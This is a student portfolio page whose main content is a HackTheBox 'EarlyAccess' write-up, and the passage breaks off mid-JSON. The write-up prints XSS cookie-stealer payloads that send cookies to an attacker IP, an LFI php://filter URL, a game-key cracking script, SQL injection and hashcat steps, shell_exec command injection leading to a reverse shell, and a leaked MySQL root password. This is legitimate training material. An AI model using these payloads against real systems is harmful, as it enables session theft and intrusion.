          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
           <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
          number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
          found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
           <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/WWW-DataShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-DataShell.png" alt=""></a>
          <p>And we're in! I looked in the /etc/passwd and noticed another user named www-adm which
          looked like the next user I needed. After looking around for a bit and I couldn't find
          anything I thought what if they reused passwords?</p>
          <a href="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WWW-AdmShell.png" alt=""></a>
          <p>And they did so now we have www-adm shell. After looking around I noticed a .wgetrc file
          with some credentials in it. Because it looked like docker was running on the machine I
          thought http://api:5000/ was my best bet.</p>
          <a href="img/portfolio/minor/red/htb_linux/WGETAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/WGETAPI.png" alt=""></a>
          <p>And it was! Apparently there is a check_db endpoint but it required credentials. So I
          tried to credentials we've just found.</p>
          <a href="img/portfolio/minor/red/htb_linux/CatCheckDB.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/CatCheckDB.png" alt=""></a>
          <p>Looks like JSON but we first need to prettify it to make it more readable.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              {
             "message":{
                "AppArmorProfile":"docker-default",
                "Args":[
                   "--character-set-server=utf8mb4",
                   "--collation-server=utf8mb4_bin",
                   "--skip-character-set-client-handshake",
                   "--max_allowed_packet=50MB",
                   "--general_log=0",
                   "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                ],
                "Config":{
                   "AttachStderr":false,
                   "AttachStdin":false,
                   "AttachStdout":false,
                   "Cmd":[
                      "--character-set-server=utf8mb4",
                      "--collation-server=utf8mb4_bin",
                      "--skip-character-set-client-handshake",
                      "--max_allowed_packet=50MB",
                      "--general_log=0",
                      "--sql_mode=ANSI_QUOTES,ERROR_FOR_DIVISION_BY_ZERO,IGNORE_SPACE,NO_ENGINE_SUBSTITUTION,NO_ZERO_DATE,NO_ZERO_IN_DATE,PIPES_AS_CONCAT,REAL_AS_FLOAT,STRICT_ALL_TABLES"
                   ],
                   "Domainname":"",
                   "Entrypoint":[
                      "docker-entrypoint.sh"
                   ],
                   "Env":[
                      "MYSQL_DATABASE=db",
                      "MYSQL_USER=drew",
                      "MYSQL_PASSWORD=drew",
                      "MYSQL_ROOT_PASSWORD=XeoNu86JTznxMCQuGHrGutF3Csq5",
                      "SERVICE_TAGS=dev",
                      "SERVICE_NAME=mysql",
                      "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
                      "GOSU_VERSION=1.12",
                      "MYSQL_MAJOR=8.0",
                      "MYSQL_VERSION=8.0.25-1debian10"
                   ],
                   "ExposedPorts":{
                      "3306/tcp":{
          
                      },
                      "33060/tcp":{
          
                      }
                   },
                   "Healthcheck":{
                      "Interval":5000000000,
                      "Retries":3,
                      "Test":[
                         "CMD-SHELL",
